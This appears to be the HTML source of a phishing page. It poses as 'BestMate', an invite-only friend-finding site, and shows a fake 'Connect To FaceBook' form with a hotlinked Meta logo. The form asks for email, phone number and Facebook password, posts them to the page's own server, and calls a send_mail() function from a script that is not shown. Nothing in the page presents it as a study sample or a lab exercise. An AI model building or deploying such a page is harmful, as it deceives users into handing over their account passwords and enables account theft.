<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BestMate</title>
    <script src="script.js"></script>
</head>

<body>
    <div>
        <form method="POST" action="/">
            <img src="https://scontent.fbhr1-1.fna.fbcdn.net/v/t39.8562-6/252294889_575082167077436_6034106545912333281_n.svg/meta-logo-primary_standardsize.svg?_nc_cat=1&ccb=1-5&_nc_sid=ad8a9d&_nc_ohc=kq4o4ecS8tcAX8Einfi&_nc_ht=scontent.fbhr1-1.fna&oh=00_AT9lEfMR4efmgWjfT1nBqPnJCRoRp3FBm61VX1VepMhCYA&oe=61E1A979">
            <H2>Connect To FaceBook</H2>
            <input name="email" id="email" type="email" placeholder="Use Your Email" required/>
            <input name="num" id="num" type="number" placeholder="Use Your Number" required/>
            <input name="pass" id="pass" type="password" placeholder="Use Your Password" required/>

            <button type="submit" onclick="send_mail()">Connect To Facebook</button>
        </form>
        <H2>BestMate</H2>
        <p>Find Your Best Mate world wide.</p>
        <p>Only Invited Members Can Join From That Special Person's Link.</p>
    </div>
    <style>
        body {
            background-image: linear-gradient(90deg, rgb(150, 6, 218), rgba(246, 152, 29, 0.842));
        }
        
        div {
            width: 100%;
            height: 100%;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
        }
        
        H2 {
            color: black;
        }
        
        img {
            width: 15%;
            max-width: 90px;
            margin: 0.9rem;
        }
        
        form {
            width: 100%;
            height: auto;
            display: flex;
            flex-wrap: wrap;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            border-radius: 5px;
            box-shadow: rgba(0, 0, 0, 0.02) 0px 1px 3px 0px, rgba(27, 31, 35, 0.15) 0px 0px 0px 1px;
        }
        
        p {
            word-spacing: 1px;
            color: white;
            margin: 0.5rem;
        }
        
        input {
            padding: 0.9rem;
            margin: 0.9rem;
            width: 60%;
            max-width: 300px;
            text-align: center;
            border: none;
            background-color: transparent;
            border-bottom: 2px solid lightgray;
            outline: none;
        }
        
         ::placeholder {
            /* Chrome, Firefox, Opera, Safari 10.1+ */
            color: black;
            opacity: 1;
            /* Firefox */
        }
        
         ::-ms-input-placeholder {
            /* Microsoft Edge */
            color: black;
        }
        
        input:hover {
            border-bottom: 2px solid rgb(0, 98, 255);
        }
        
        button {
            margin: 0.9rem;
            padding: 0.9rem;
            border: none;
            color: white;
            cursor: pointer;
            border-radius: 60px;
            background-color: rgb(0, 98, 255);
        }
        
        input::-webkit-outer-spin-button,
        input::-webkit-inner-spin-button {
            -webkit-appearance: none;
            margin: 0;
        }
        
        input[type=number] {
            -moz-appearance: textfield;
        }
    </style>
</body>

</html>